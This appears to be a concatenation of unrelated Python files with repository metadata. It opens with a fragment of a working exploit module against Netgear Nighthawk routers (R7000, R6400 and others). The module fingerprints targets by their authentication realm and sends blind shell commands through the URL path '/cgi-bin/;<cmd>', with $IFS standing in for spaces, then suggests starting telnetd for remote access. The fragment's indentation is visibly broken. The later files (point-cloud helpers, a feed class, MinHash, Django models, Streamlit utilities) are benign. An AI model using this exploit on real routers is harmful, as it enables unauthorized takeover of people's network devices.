            'R8000 Nighthawk (AC3200)',
            'R8500 Nighthawk X8 (AC5300)',
            'R9000 Nighthawk X10 (AD7200)',
        ]
    }
    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
    port = exploits.Option(80, 'Target Port', validators=validators.integer)
    def run(self):
        """Check the target and, if it looks vulnerable, open a command loop."""
        if self.check():
            print_success("Target is probably vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection. Try to start telnet with telnet telnetd -p '4445'")
            shell(self, architecture="armle")
    else:
            print_error("Target is not vulnerable")
    def execute(self, cmd):
        """Send one injected command; blind injection, so nothing is read back."""
        # $IFS stands in for spaces so the injected command survives URL handling.
        cmd = cmd.replace(" ", "$IFS")
        url = "{}:{}/cgi-bin/;{}".format(self.target, self.port, cmd)
        http_request(method="GET", url=url)
        return ""
    @mute
    def check(self):
        """Fingerprint the router via the WWW-Authenticate realm on '/'."""
        url = "{}:{}/".format(self.target, self.port)
        response = http_request(method="HEAD", url=url)
        if response is None:
            return False # target is not vulnerable
        if "WWW-Authenticate" in response.headers.keys():
            if any(map(lambda x: x in response.headers['WWW-Authenticate'], ["NETGEAR R7000", "NETGEAR R6400"])):
                return True # target is vulnerable
        return False # target is not vulnerable
| 989 | 0 | 80 |
6ba2273aee35bc6f9aba457d1b63e54dd5e5369f | 3,300 | py | Python | test.py | leJson/DRN | 27d7cb3b40d5a760fd7bf9b14b390cbdb08d617b | [
"MIT"
] | 1 | 2021-07-25T13:52:04.000Z | 2021-07-25T13:52:04.000Z | test.py | leJson/DRN | 27d7cb3b40d5a760fd7bf9b14b390cbdb08d617b | [
"MIT"
] | null | null | null | test.py | leJson/DRN | 27d7cb3b40d5a760fd7bf9b14b390cbdb08d617b | [
"MIT"
] | null | null | null | import json
import numpy as np
import open3d as o3d
if __name__ == '__main__':
mse_cal()
# read_pcd_pointclouds()
# show_gd()
# file_path = '/home/ljs/workspace/eccv/FirstTrainingData/out_4096/train/38.pcd'
# read_pcd_pointclouds(file_path)
| 28.947368 | 84 | 0.646061 | import json
import numpy as np
import open3d as o3d
def json_load(filename):
    """Load and return the JSON document stored in `filename`."""
    # Renamed the result from `vars` (shadowed the builtin) and dropped the
    # dead commented-out numpy conversion loop.
    with open(filename, "r") as fr:
        data = json.load(fr)
    return data
def _show_gd():
    """Print every field of the hard-coded image entry in GroundTruth.json.

    NOTE(review): path and index are hard-coded; appears superseded by
    show_gd(), which additionally returns the numeric labels.
    """
    path = '/home/ljs/workspace/eccv/FirstTrainingData/label/GroundTruth.json'
    index = '50'
    contxt = json_load(path)
    print(contxt)
    contxt = contxt['Measurements']
    print(contxt)
    print(100*'*')
    item = 'Image%s' % index
    print(contxt[item])
    print(contxt[item]['Variety'])
    print(contxt[item]['RGBImage'])
    print(contxt[item]['DebthInformation'])
    print(contxt[item]['FreshWeightShoot'])
    print(contxt[item]['DryWeightShoot'])
    print(contxt[item]['Height'])
    print(contxt[item]['Diameter'])
    print(contxt[item]['LeafArea'])
    pass
def show_gd():
    """Print the hard-coded image entry and return its numeric labels.

    Returns [FreshWeightShoot, DryWeightShoot, Height, Diameter, LeafArea].
    NOTE(review): `path` and `index` are hard-coded like in _show_gd().
    """
    path = '/home/ljs/workspace/eccv/FirstTrainingData/label/GroundTruth.json'
    index = '50'
    per_label = list()
    contxt = json_load(path)
    print(contxt)
    contxt = contxt['Measurements']
    print(contxt)
    print(100*'*')
    item = 'Image%s' % index
    print(contxt[item])
    print(contxt[item]['Variety'])
    print(contxt[item]['RGBImage'])
    print(contxt[item]['DebthInformation'])
    print(contxt[item]['FreshWeightShoot'])
    print(contxt[item]['DryWeightShoot'])
    print(contxt[item]['Height'])
    print(contxt[item]['Diameter'])
    print(contxt[item]['LeafArea'])
    per_label.append(contxt[item]['FreshWeightShoot'])
    per_label.append(contxt[item]['DryWeightShoot'])
    per_label.append(contxt[item]['Height'])
    per_label.append(contxt[item]['Diameter'])
    per_label.append(contxt[item]['LeafArea'])
    return per_label
    # pass
def read_Label(path):
    """Load GroundTruth.json and return its 'Measurements' mapping.

    NOTE(review): the `path` argument is immediately overwritten by the
    hard-coded path below, so callers cannot actually choose the file.
    """
    path = '/home/ljs/workspace/eccv/FirstTrainingData/label/GroundTruth.json'
    index = '50'
    contxt = json_load(path)
    print(contxt)
    contxt = contxt['Measurements']
    return contxt
    # print(contxt)
    # print(100*'*')
    # item = 'Image%s' % index
    # print(contxt[item])
    # print(contxt[item]['Variety'])
    # print(contxt[item]['RGBImage'])
    # print(contxt[item]['DebthInformation'])
    # print(contxt[item]['FreshWeightShoot'])
    # print(contxt[item]['DryWeightShoot'])
    # print(contxt[item]['Height'])
    # print(contxt[item]['Diameter'])
    # print(contxt[item]['LeafArea'])
    # pass
def read_pcd_pointclouds(file_path):
    """Load a PCD file and return an (N, 6) array: XYZ followed by RGB."""
    cloud = o3d.io.read_point_cloud(file_path)
    xyz = np.asarray(cloud.points)
    # Colors stay in open3d's native [0, 1] range (no *255 rescaling).
    rgb = np.asarray(cloud.colors)
    points = np.concatenate([xyz, rgb], axis=1)
    print(points.shape)
    return points
def mse_cal():
    """Print the element-wise squared difference of two small demo arrays."""
    x = np.asarray([[1,2,4], [2,3,5]])
    y = np.asarray([[0,0,4], [2,3,5]])
    diff = x - y
    print(diff * diff)
if __name__ == '__main__':
    # Only the squared-difference demo runs; other calls are kept as notes.
    mse_cal()
    # read_pcd_pointclouds()
    # show_gd()
    # file_path = '/home/ljs/workspace/eccv/FirstTrainingData/out_4096/train/38.pcd'
    # read_pcd_pointclouds(file_path)
| 2,894 | 0 | 138 |
f7e3d925b7c1ac732ec83c398d423d152de0d348 | 315 | py | Python | stream_framework/feeds/memory.py | amitpatra/Stream-Framework | 2c40d537fc5a8b3d721060f33b817fb0ca5ec2ee | [
"BSD-3-Clause"
] | 3,964 | 2015-01-01T04:20:20.000Z | 2022-03-27T06:29:41.000Z | stream_framework/feeds/memory.py | amitpatra/Stream-Framework | 2c40d537fc5a8b3d721060f33b817fb0ca5ec2ee | [
"BSD-3-Clause"
] | 123 | 2015-01-02T10:12:22.000Z | 2022-02-24T04:48:38.000Z | stream_framework/feeds/memory.py | amitpatra/Stream-Framework | 2c40d537fc5a8b3d721060f33b817fb0ca5ec2ee | [
"BSD-3-Clause"
] | 536 | 2015-01-02T06:16:50.000Z | 2022-03-07T15:40:45.000Z | from stream_framework.feeds.base import BaseFeed
from stream_framework.storage.memory import InMemoryActivityStorage
from stream_framework.storage.memory import InMemoryTimelineStorage
| 35 | 67 | 0.869841 | from stream_framework.feeds.base import BaseFeed
from stream_framework.storage.memory import InMemoryActivityStorage
from stream_framework.storage.memory import InMemoryTimelineStorage
class Feed(BaseFeed):
    """Feed whose timelines and activities are stored in process memory."""
    # Both storage backends are the in-memory implementations.
    timeline_storage_class = InMemoryTimelineStorage
    activity_storage_class = InMemoryActivityStorage
| 0 | 106 | 23 |
1406ecd917ed3d4abcb32d216404ddeddc169ba6 | 4,149 | py | Python | global_sewage_signatures/MinHash.py | josl/global-sewage-signatures | f4d314616706f2ff7d437a258d16c7ce5df64bfd | [
"MIT"
] | null | null | null | global_sewage_signatures/MinHash.py | josl/global-sewage-signatures | f4d314616706f2ff7d437a258d16c7ce5df64bfd | [
"MIT"
] | null | null | null | global_sewage_signatures/MinHash.py | josl/global-sewage-signatures | f4d314616706f2ff7d437a258d16c7ce5df64bfd | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of global_sewage_signatures.
# https://github.com/josl/Global_Sewage_Signatures
# Licensed under the MIT license:
# http://www.opensource.org/licenses/MIT-license
# Copyright (c) 2016, Jose L. Bellod Cisneros & Kosai Al-Nakked
# <bellod.cisneros@gmail.com & kosai@cbs.dtu.dk>
import numpy as np
import math
from collections import defaultdict
# We keep a global count of all coefficients for the Universal Hashing to
# have unique set of numbers
coefficients = set()
# Reference: http://www.mmds.org/mmds/v2.1/ch03-lsh.pdf
# Each permutation is applied to all the rows and we update the signature
# matrix based on the column with the minimum hash found so far
# All-against-all comparison of the signature matrix result of the
# permutation. We compare each signature for each document and group
# similar items together if their jaccard similarity is less than the
# distance provided
| 37.044643 | 77 | 0.626175 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of global_sewage_signatures.
# https://github.com/josl/Global_Sewage_Signatures
# Licensed under the MIT license:
# http://www.opensource.org/licenses/MIT-license
# Copyright (c) 2016, Jose L. Bellod Cisneros & Kosai Al-Nakked
# <bellod.cisneros@gmail.com & kosai@cbs.dtu.dk>
import numpy as np
import math
from collections import defaultdict
# We keep a global count of all coefficients for the Universal Hashing to
# have unique set of numbers
coefficients = set()
class HashPermutation():
    global coefficients
    def __init__(self, N, p=None):
        """One universal hash h(x) = ((a*x + b) % p) % N.

        N -- number of rows being permuted
        p -- prime modulus shared by all hash functions (caller-supplied)
        """
        self.p = p
        self.a, self.b = self.get_coefficients()
        self.N = N
    def get_coefficients(self):
        """Draw an (a, b) coefficient pair unique across all instances."""
        a = np.random.randint(1, self.p, size=1)[0]
        b = np.random.randint(0, self.p, size=1)[0]
        if (a, b) in coefficients:
            # Collision with a previously issued pair: draw again.
            return self.get_coefficients()
        coefficients.add((a, b))
        return (a, b)
    # We find a random prime number required by the Universal Hashing method
    @staticmethod
    def random_prime(n):
        """Return the first prime in [n*500, n*2000).

        Bug fix: the original trial division stepped by 2 starting at 2,
        so only even divisors were tested and odd composites (e.g. 501)
        were reported as prime; it could also hit an undefined loop index
        when the divisor range was empty.
        """
        for candidate in range(n * 500, n * 2000):
            if candidate <= 1:
                continue
            for i in range(2, int(np.sqrt(candidate)) + 1):
                if candidate % i == 0:
                    break
            else:
                # No divisor found: candidate is prime.
                return candidate
    # Universal Hashing based on modular arithmetic:
    # a and b are random coefficients and p is a prime number fixed for all
    # Hashing functions. N is the number of rows we are hashing and the
    # module allows us to wrap our result (the permutation) around the number
    # of rows.
    def hash(self, x):
        return (((self.a * x) + self.b) % self.p) % self.N
class MinHash():
    """MinHash signatures for locality-sensitive grouping of sparse points.

    Reference: http://www.mmds.org/mmds/v2.1/ch03-lsh.pdf
    """
    def __init__(self, dist, sparse_matrix, k_permutations):
        """Prepare signature storage and k universal hash functions."""
        global coefficients
        self.dist = dist
        self.sparse_matrix = sparse_matrix
        self.point_set = {}
        self.point_dict = {}
        self.k_permutations = k_permutations
        self.dimensions = self.sparse_matrix.shape[1]
        self.n_points = self.sparse_matrix.shape[0]
        # Signatures start at +inf so any real hash value replaces them.
        self.signatures = [
            np.array([math.inf] * self.k_permutations)
            for _ in range(self.n_points)
        ]
        self.neighbors = defaultdict(set)
        # One universal hash function per permutation; all share the same
        # prime modulus, but each draws its own random coefficients.
        shared_prime = HashPermutation.random_prime(self.n_points)
        self.hash_permutations = [
            HashPermutation(self.n_points, shared_prime).hash
            for _ in range(self.k_permutations)
        ]
        self.permutations = {}
    def signature_distance(self, a, b):
        """Fraction of signature slots on which *a* and *b* agree."""
        return (a == b).sum() / self.k_permutations
    # Each permutation is applied to all the rows and we update the signature
    # matrix based on the column with the minimum hash found so far.
    def createMinHash(self):
        """Fill the signature matrix with the per-permutation minimum hash."""
        for point in range(self.n_points):
            signature = self.signatures[point]
            for slot, permute in enumerate(self.hash_permutations):
                for row in self.sparse_matrix[point].indices:
                    hashed = permute(row)
                    if hashed < signature[slot]:
                        signature[slot] = hashed
    # All-against-all comparison of the signature matrix: points whose
    # signature distance is within self.dist are grouped as neighbors.
    def find_neighbors(self):
        """Populate self.neighbors with all pairs within distance self.dist."""
        for i, sig_i in enumerate(self.signatures):
            for j, sig_j in enumerate(self.signatures):
                if 1 - self.signature_distance(sig_i, sig_j) <= self.dist:
                    self.neighbors[i].add(j)
| 2,507 | 501 | 152 |
2e1c3e6f0e44cfdaf234da9e9952911db70a62dc | 10,021 | py | Python | apps/sso/models.py | g10f/sso | ba6eb712add388c69d4880f5620a2e4ce42d3fee | [
"BSD-3-Clause"
] | 3 | 2021-05-16T17:06:57.000Z | 2021-05-28T17:14:05.000Z | apps/sso/models.py | g10f/sso | ba6eb712add388c69d4880f5620a2e4ce42d3fee | [
"BSD-3-Clause"
] | null | null | null | apps/sso/models.py | g10f/sso | ba6eb712add388c69d4880f5620a2e4ce42d3fee | [
"BSD-3-Clause"
] | null | null | null | import logging
import os
import re
import uuid
from io import BytesIO
from mimetypes import guess_extension
from os.path import splitext
from PIL import Image
from django.core.files.uploadedfile import InMemoryUploadedFile
from django.core.validators import RegexValidator
from django.db import models
from django.db.models import fields
from django.forms import forms
from django.forms.models import model_to_dict
from django.utils.crypto import get_random_string
from django.utils.text import get_valid_filename
from django.utils.translation import gettext_lazy as _
from l10n.models import Country, AdminArea
logger = logging.getLogger(__name__)
def ensure_single_primary(queryset):
    """
    ensure that at most one item of the queryset is primary

    If several items are flagged primary, all but the first are demoted;
    if none is flagged, the first item of the queryset (if any) is
    promoted. Every modified item is saved individually.
    """
    primary_items = queryset.filter(primary=True)
    if primary_items.count() > 1:
        # Too many primaries: keep the first, demote the rest.
        for item in primary_items[1:]:
            item.primary = False
            item.save()
    elif primary_items.count() == 0:
        # No primary yet: promote the first item, if any exists.
        item = queryset.first()
        if item:
            item.primary = True
            item.save()
class AddressMixin(models.Model):
"""
Address information
see i.e. http://tools.ietf.org/html/draft-ietf-scim-core-schema-03 or http://schema.org/PostalAddress
"""
addressee = models.CharField(_("addressee"), max_length=80)
street_address = models.TextField(_('street address'), blank=True,
help_text=_('Full street address, with house number, street name, P.O. box, and '
'extended street address information.'), max_length=512)
city = models.CharField(_("city"), max_length=100) # , help_text=_('City or locality')
city_native = models.CharField(_("city in native language"), max_length=100, blank=True)
postal_code = models.CharField(_("postal code"), max_length=30, blank=True)
country = models.ForeignKey(Country, on_delete=models.CASCADE, verbose_name=_("country"),
limit_choices_to={'active': True})
region = models.CharField(_("region"), help_text=_('State or region'), blank=True, max_length=100)
primary = models.BooleanField(_("primary"), default=False)
# formatted : formatted Address for mail http://tools.ietf.org/html/draft-ietf-scim-core-schema-03
phone_re = re.compile(
r'^\+\d{1,3}' + r'((-?\d+)|(\s?\(\d+\)\s?)|\s?\d+){1,9}$'
)
validate_phone = RegexValidator(phone_re, _("Enter a valid phone number i.e. +49 (531) 123456"), 'invalid')
def update_object_from_dict(destination, source_dict, key_mapping=None):
"""
check if the values in the destination object differ from
the values in the source_dict and update if needed
key_mapping can be a simple mapping of key names or
a mapping of key names to a tuple with a key name and a transformation
for the value,
for example {'key': ('new_key', lambda x : x + 2), ..}
"""
if not key_mapping: key_mapping = {}
field_names = [f.name for f in destination._meta.fields]
new_object = True if destination.pk is None else False
updated = False
for key in source_dict:
field_name = key
transformation = None
if key in key_mapping:
if isinstance(key_mapping[key], tuple):
(field_name, transformation) = key_mapping[key]
else:
field_name = key_mapping[key]
if field_name in field_names:
if transformation is None:
new_value = source_dict[key]
else:
new_value = transformation(source_dict[key])
if new_object:
setattr(destination, field_name, new_value)
else:
old_value = getattr(destination, field_name)
if old_value != new_value:
setattr(destination, field_name, new_value)
updated = True
if updated or new_object:
destination.save()
| 35.285211 | 119 | 0.623491 | import logging
import os
import re
import uuid
from io import BytesIO
from mimetypes import guess_extension
from os.path import splitext
from PIL import Image
from django.core.files.uploadedfile import InMemoryUploadedFile
from django.core.validators import RegexValidator
from django.db import models
from django.db.models import fields
from django.forms import forms
from django.forms.models import model_to_dict
from django.utils.crypto import get_random_string
from django.utils.text import get_valid_filename
from django.utils.translation import gettext_lazy as _
from l10n.models import Country, AdminArea
logger = logging.getLogger(__name__)
def get_filename(filename):
    """Reduce *filename* to a sanitised, normalised base name.

    Strips any directory components, lets Django's ``get_valid_filename``
    drop unsafe characters, and normalises the resulting path string.
    """
    base_name = os.path.basename(filename)
    safe_name = get_valid_filename(base_name)
    return os.path.normpath(safe_name)
def transpose_image(picture):
    """Rotate/flip *picture* according to its EXIF orientation tag.

    Takes and returns a Django ``UploadedFile`` whose ``.image`` attribute
    is a Pillow image. Returns the input unchanged when no transposition
    is needed; otherwise returns a *new* ``InMemoryUploadedFile`` wrapping
    the transposed image.
    """
    # copied from ImageOps.exif_transpose but avoiding to create a copy if not
    # transposed
    # argument is a UploadedFile Object instead of Image
    # exif is only in TIFF and JPEG available
    if picture.image.format not in ['JPEG', 'TIFF']:
        return picture
    exif = picture.image.getexif()
    # 0x0112 is the EXIF orientation tag; map its value to a Pillow
    # transpose operation (identity values 0/1 map to None).
    orientation = exif.get(0x0112)
    method = {
        2: Image.FLIP_LEFT_RIGHT,
        3: Image.ROTATE_180,
        4: Image.FLIP_TOP_BOTTOM,
        5: Image.TRANSPOSE,
        6: Image.ROTATE_270,
        7: Image.TRANSVERSE,
        8: Image.ROTATE_90,
    }.get(orientation)
    if method is not None:
        image = Image.open(picture.file)
        transposed_image = image.transpose(method)
        # Drop the orientation tag so the image is not re-rotated later.
        del exif[0x0112]
        transposed_image.info["exif"] = exif.tobytes()
        # create a new UploadedFile
        f = BytesIO()
        transposed_image.save(f, image.format)
        picture = InMemoryUploadedFile(
            file=f,
            field_name=picture.field_name,
            name=picture.name,
            content_type=picture.content_type,
            # f.tell() is the number of bytes just written by save().
            size=f.tell(),
            charset=picture.charset,
            content_type_extra=picture.content_type_extra
        )
        picture.image = transposed_image
        return picture
    return picture
def clean_picture(picture, max_upload_size):
    """Validate an uploaded picture and normalise its filename.

    Raises ``forms.ValidationError`` when the file is larger than
    *max_upload_size* or is not an image. On success the file is renamed
    to a random 7-character name (keeping a suitable extension) and, on a
    best-effort basis, EXIF-transposed via :func:`transpose_image`.
    Non-file values (e.g. ``None`` or an unchanged field) pass through
    unchanged.
    """
    from django.template.defaultfilters import filesizeformat
    if picture and hasattr(picture, 'content_type'):
        base_content_type = picture.content_type.split('/')[0]
        if base_content_type in ['image']:
            if picture.size > max_upload_size:
                raise forms.ValidationError(
                    _('Please keep filesize under %(filesize)s. Current filesize %(current_filesize)s') %
                    {'filesize': filesizeformat(max_upload_size),
                     'current_filesize': filesizeformat(picture.size)})
            # mimetypes.guess_extension return jpe which is quite uncommon for jpeg
            if picture.content_type == 'image/jpeg':
                file_ext = '.jpg'
            else:
                file_ext = guess_extension(picture.content_type)
            if file_ext is None:
                # keep the original extension
                file_ext = splitext(picture.name)[1].lower()
            picture.name = "%s%s" % (
                get_random_string(7, allowed_chars='abcdefghijklmnopqrstuvwxyz0123456789'), file_ext)
            try:
                picture = transpose_image(picture)
            except Exception as e:
                # Fix: the message previously had no %s placeholder for the
                # lazy argument, which made the logging call itself error.
                logger.warning("Transpose image failed: %s", e)
        else:
            raise forms.ValidationError(_('File type is not supported'))
    return picture
class CaseInsensitiveEmailField(fields.EmailField):
    """EmailField stored in a case-insensitive database column."""
    def db_type(self, connection):
        # "citext" is a case-insensitive text column type (provided by the
        # PostgreSQL citext extension) -- assumes the database backend
        # supports it; TODO confirm for non-PostgreSQL backends.
        return "citext"
class AbstractBaseModelManager(models.Manager):
    """Manager enabling natural-key (de)serialization by ``uuid``."""
    def get_by_natural_key(self, uuid):
        """Return the single object whose ``uuid`` matches."""
        return self.get(uuid=uuid)
class AbstractBaseModel(models.Model):
    """Abstract base model with a unique ``uuid`` natural key and an
    auto-updated ``last_modified`` timestamp."""
    uuid = models.UUIDField(unique=True, default=uuid.uuid4, editable=True)
    last_modified = models.DateTimeField(_('last modified'), auto_now=True)
    objects = AbstractBaseModelManager()
    class Meta:
        abstract = True
        # ordering = ['name']
        get_latest_by = 'last_modified'
    def natural_key(self):
        """Return the natural key as a 1-tuple (mirrors the manager's
        ``get_by_natural_key``)."""
        return self.uuid,
def ensure_single_primary(queryset):
    """
    ensure that at most one item of the queryset is primary

    If several items are flagged primary, all but the first are demoted;
    if none is flagged, the first item of the queryset (if any) is
    promoted. Every modified item is saved individually.
    """
    primary_items = queryset.filter(primary=True)
    if primary_items.count() > 1:
        # Too many primaries: keep the first, demote the rest.
        for item in primary_items[1:]:
            item.primary = False
            item.save()
    elif primary_items.count() == 0:
        # No primary yet: promote the first item, if any exists.
        item = queryset.first()
        if item:
            item.primary = True
            item.save()
class AddressMixin(models.Model):
    """
    Address information
    see i.e. http://tools.ietf.org/html/draft-ietf-scim-core-schema-03 or http://schema.org/PostalAddress

    Abstract mixin; ``primary`` marks the preferred address of a set
    (see ensure_single_primary).
    """
    addressee = models.CharField(_("addressee"), max_length=80)
    street_address = models.TextField(_('street address'), blank=True,
                                      help_text=_('Full street address, with house number, street name, P.O. box, and '
                                                  'extended street address information.'), max_length=512)
    city = models.CharField(_("city"), max_length=100) # , help_text=_('City or locality')
    city_native = models.CharField(_("city in native language"), max_length=100, blank=True)
    postal_code = models.CharField(_("postal code"), max_length=30, blank=True)
    # Only countries flagged active are selectable in forms/admin.
    country = models.ForeignKey(Country, on_delete=models.CASCADE, verbose_name=_("country"),
                                limit_choices_to={'active': True})
    region = models.CharField(_("region"), help_text=_('State or region'), blank=True, max_length=100)
    primary = models.BooleanField(_("primary"), default=False)
    # formatted : formatted Address for mail http://tools.ietf.org/html/draft-ietf-scim-core-schema-03
    class Meta:
        abstract = True
        verbose_name = _("address")
        verbose_name_plural = _("addresses")
        ordering = ['addressee']
    def __str__(self):
        return self.addressee
phone_re = re.compile(
r'^\+\d{1,3}' + r'((-?\d+)|(\s?\(\d+\)\s?)|\s?\d+){1,9}$'
)
validate_phone = RegexValidator(phone_re, _("Enter a valid phone number i.e. +49 (531) 123456"), 'invalid')
class PhoneNumberMixin(models.Model):
    """Abstract mixin adding a validated phone number with a ``primary``
    flag; primary numbers sort first."""
    phone = models.CharField(_("phone number"), max_length=30, validators=[validate_phone])
    primary = models.BooleanField(_("primary"), default=False)
    class Meta:
        abstract = True
        ordering = ['-primary']
        verbose_name = _("phone number")
        verbose_name_plural = _("phone numbers")
    def __str__(self):
        return self.phone
def update_object_from_dict(destination, source_dict, key_mapping=None):
    """
    check if the values in the destination object differ from
    the values in the source_dict and update if needed
    key_mapping can be a simple mapping of key names or
    a mapping of key names to a tuple with a key name and a transformation
    for the value,
    for example {'key': ('new_key', lambda x : x + 2), ..}

    The destination is saved when it is new (pk is None) or when at
    least one field value actually changed.
    """
    key_mapping = key_mapping if key_mapping else {}
    model_fields = [f.name for f in destination._meta.fields]
    is_new = destination.pk is None
    changed = False
    for source_key, raw_value in source_dict.items():
        # Resolve the target field name and optional value transformation.
        mapped = key_mapping.get(source_key, source_key)
        if isinstance(mapped, tuple):
            target_field, convert = mapped
        else:
            target_field, convert = mapped, None
        if target_field not in model_fields:
            continue
        value = raw_value if convert is None else convert(raw_value)
        if is_new:
            setattr(destination, target_field, value)
        elif getattr(destination, target_field) != value:
            setattr(destination, target_field, value)
            changed = True
    if changed or is_new:
        destination.save()
def filter_dict_from_kls(destination, source_dict, prefix=''):
    """Return the subset of *source_dict* that maps onto *destination*'s
    model fields.

    Each field name is looked up in *source_dict* as ``prefix + name``;
    the returned dict is keyed by the bare field name.
    """
    return {
        field.name: source_dict['%s%s' % (prefix, field.name)]
        for field in destination._meta.fields
        if '%s%s' % (prefix, field.name) in source_dict
    }
def map_dict2dict(mapping, source_dict, with_defaults=False):
    """Translate *source_dict* into a new dict according to *mapping*.

    Each mapping value is either a plain target key name, or a dict with
    a ``name`` plus optional ``parser`` (value transformation),
    ``validate`` (predicate, ValueError on failure) and ``default``
    (used when *with_defaults* is true and the key is absent).
    """
    result = {}
    for src_key, spec in mapping.items():
        if src_key in source_dict:
            raw = source_dict[src_key]
            if isinstance(spec, dict):
                target = spec['name']
                parse = spec.get('parser', None)
                if parse is not None:
                    try:
                        value = parse(raw)
                    except Exception as exc:
                        logger.exception('could not parse value: %s' % raw)
                        raise exc
                else:
                    value = raw
                check = spec.get('validate', None)
                if check is not None and not check(value):
                    raise ValueError("\"%s\" is not valid for %s" % (value, target))
            else:
                target = spec
                value = raw
            result[target] = value
        elif with_defaults:
            # Fall back to the declared default, if the spec provides one.
            try:
                if isinstance(spec, dict):
                    result[spec['name']] = spec['default']
            except KeyError:
                pass
    return result
def update_object_from_object(destination, source, exclude=None):
    """Copy field values from model instance *source* onto *destination*.

    *exclude* lists field names to skip (defaults to ['id']); the actual
    diff-and-save logic is delegated to update_object_from_dict.
    """
    if not exclude: exclude = ['id']
    source_dict = model_to_dict(source, exclude=exclude)
    update_object_from_dict(destination, source_dict)
| 4,791 | 893 | 337 |
3157f5f59081200ecb286bedec5b74c9a42bd95e | 226 | py | Python | app/main/errors.py | pascaline-irabaruta/news-app | 073479204e6fd0f992e1529824171945e520ee16 | [
"MIT"
] | 1 | 2022-02-09T14:35:37.000Z | 2022-02-09T14:35:37.000Z | app/main/errors.py | Nyota254/news-summary | a2844de42c00f8eab26e358e2ebfdcfe06a372df | [
"MIT"
] | null | null | null | app/main/errors.py | Nyota254/news-summary | a2844de42c00f8eab26e358e2ebfdcfe06a372df | [
"MIT"
] | null | null | null | from flask import render_template
from . import main
@main.app_errorhandler(404)
def four_o_four(error):
    '''
    Render the custom 404 error page for any unknown route,
    returning the rendered template together with the 404 status code.
    '''
    return render_template('fourofour.html'),404
| 22.6 | 54 | 0.725664 | from flask import render_template
from . import main
@main.app_errorhandler(404)
def four_o_four(error):
    '''
    Render the custom 404 error page for any unknown route,
    returning the rendered template together with the 404 status code.
    '''
    return render_template('fourofour.html'),404
| 0 | 0 | 0 |
9b44dec8def3ef6e4bf77338dedc2dbf168db1a2 | 1,829 | py | Python | web/utility.py | dan0nchik/SAP-HANA-AutoML | 68cde80bd7fbfc751fb56062af30aec9238f9fb3 | [
"MIT"
] | 59 | 2021-01-10T18:35:38.000Z | 2022-02-28T16:49:06.000Z | web/utility.py | u1810291/SAP-HANA-AutoML | 06200bd1f813916fc81eb1ccb0ed0b1275e22945 | [
"MIT"
] | 3 | 2021-02-01T19:33:39.000Z | 2021-06-29T08:32:33.000Z | web/utility.py | u1810291/SAP-HANA-AutoML | 06200bd1f813916fc81eb1ccb0ed0b1275e22945 | [
"MIT"
] | 10 | 2021-06-18T12:35:34.000Z | 2021-12-28T18:48:36.000Z | import base64
import sys
from contextlib import contextmanager
from io import StringIO
from threading import current_thread
from typing import Union
import hana_ml.dataframe
import pandas
import streamlit as st
from streamlit.report_thread import REPORT_CONTEXT_ATTR_NAME
# from https://discuss.streamlit.io/t/cannot-print-the-terminal-output-in-streamlit/6602/2
@contextmanager
@contextmanager
@contextmanager
def get_table_download_link(df, file_name):
"""Generates a link allowing the data in a given panda dataframe to be downloaded
in: dataframe, file name
out: href string
"""
csv = df.to_csv(index=False)
b64 = base64.b64encode(
csv.encode()
).decode() # some strings <-> bytes conversions necessary here
return f'<a href="data:file/csv;base64,{b64}" download="{file_name}.csv">Download file</a>'
| 26.128571 | 95 | 0.651722 | import base64
import sys
from contextlib import contextmanager
from io import StringIO
from threading import current_thread
from typing import Union
import hana_ml.dataframe
import pandas
import streamlit as st
from streamlit.report_thread import REPORT_CONTEXT_ATTR_NAME
# from https://discuss.streamlit.io/t/cannot-print-the-terminal-output-in-streamlit/6602/2
@contextmanager
def st_redirect(src, dst):
    """Temporarily redirect writes on stream *src* into a Streamlit widget.

    *dst* is the name of a method on an empty Streamlit placeholder
    (e.g. 'code', 'markdown'). While the context is active, writes made
    from the Streamlit report thread are accumulated in a buffer and
    mirrored into the placeholder; writes from other threads fall back
    to the original stream. The original write method is restored on exit.
    """
    placeholder = st.empty()
    output_func = getattr(placeholder, dst)
    with StringIO() as buffer:
        old_write = src.write
        def new_write(b):
            # Only the thread carrying the Streamlit report context is
            # mirrored into the placeholder; everything else passes through.
            if getattr(current_thread(), REPORT_CONTEXT_ATTR_NAME, None):
                buffer.write(b)
                output_func(buffer.getvalue())
            else:
                old_write(b)
        try:
            src.write = new_write
            yield
        finally:
            src.write = old_write
@contextmanager
def st_stdout(dst):
    """Mirror sys.stdout into the Streamlit output method named *dst*."""
    with st_redirect(sys.stdout, dst):
        yield
@contextmanager
def st_stderr(dst):
    """Mirror sys.stderr into the Streamlit output method named *dst*."""
    with st_redirect(sys.stderr, dst):
        yield
def get_table_download_link(df, file_name):
    """Generates a link allowing the data in a given panda dataframe to be downloaded
    in:  dataframe, file name
    out: href string (an <a> tag with a base64 data: URI)
    """
    csv_text = df.to_csv(index=False)
    # Embed the CSV as base64 inside a data: URI so no server round-trip
    # is needed for the download.
    encoded = base64.b64encode(csv_text.encode()).decode()
    href = '<a href="data:file/csv;base64,%s" download="%s.csv">Download file</a>' % (
        encoded, file_name)
    return href
def get_types(df: pandas.DataFrame):
    """Return the columns of *df* that look categorical, or None if none do.

    A column counts as categorical when its dtype is object/bool, or when
    its number of distinct values is below 30% of the row count.
    """
    threshold = df.shape[0] / 100 * 30
    categorical = [
        column for column in df.columns
        if df[column].dtype in ["object", "bool"]
        or df[column].nunique() < threshold
    ]
    return categorical or None
| 884 | 0 | 89 |
1272e89ac9aa705c7db7a484d28380dfd00cbfdf | 207 | py | Python | bmcs_beam/mxn/matresdev/simiter/sim_pstudy/__init__.py | bmcs-group/bmcs_beam | b53967d0d0461657ec914a3256ec40f9dcff80d5 | [
"MIT"
] | 1 | 2021-05-07T11:10:27.000Z | 2021-05-07T11:10:27.000Z | bmcs_beam/mxn/matresdev/simiter/sim_pstudy/__init__.py | bmcs-group/bmcs_beam | b53967d0d0461657ec914a3256ec40f9dcff80d5 | [
"MIT"
] | null | null | null | bmcs_beam/mxn/matresdev/simiter/sim_pstudy/__init__.py | bmcs-group/bmcs_beam | b53967d0d0461657ec914a3256ec40f9dcff80d5 | [
"MIT"
] | null | null | null |
from .sim_model import SimModel
from .i_sim_model import ISimModel
from .sim_array import SimArray
from .sim_array_view import SimArrayView
from .sim_pstudy import SimPStudy
from .sim_output import SimOut
| 23 | 40 | 0.845411 |
